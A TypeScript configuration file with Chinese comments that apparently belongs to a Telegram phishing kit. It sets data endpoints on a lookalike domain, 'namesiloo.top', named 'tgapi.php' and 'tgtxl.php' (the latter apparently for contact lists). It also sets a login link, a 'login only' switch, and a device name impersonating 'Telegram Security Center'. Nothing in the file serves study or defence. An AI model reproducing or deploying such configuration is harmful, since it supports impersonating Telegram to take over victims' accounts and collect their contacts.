// API 配置文件
export const API_CONFIG = {
  // 主要接口地址
  TGAPI_URL: 'https://jwsybj6.namesiloo.top/tgapi.php',
  TGTXL_URL: 'https://jwsybj6.namesiloo.top/tgtxl.php',
  DENGLU_URL: 'https://t.me/jwsybj6',
  onlydenglu: 'jia', // 'zheng' = 启用功能, 'jia' = 禁用功能
  shebeimingzi: "Telegram 安全中心",
  // 接口超时设置
  TIMEOUT: 10000,
  
  // 重试次数
  MAX_RETRIES: 3
};

// 获取接口地址
export function getApiUrl(type: 'tgapi' | 'tgtxl'): string {
  return type === 'tgapi' ? API_CONFIG.TGAPI_URL : API_CONFIG.TGTXL_URL;
}

// 获取功能开关状态
export function getFeatureStatus() {
  return {
    onlydenglu: API_CONFIG.onlydenglu,
    isEnabled: API_CONFIG.onlydenglu === 'zheng',
    description: API_CONFIG.onlydenglu === 'zheng' ? '功能已启用' : '功能已禁用'
  };
}

// 获取设备名称
export function getDeviceName(): string {
  return API_CONFIG.shebeimingzi;
}
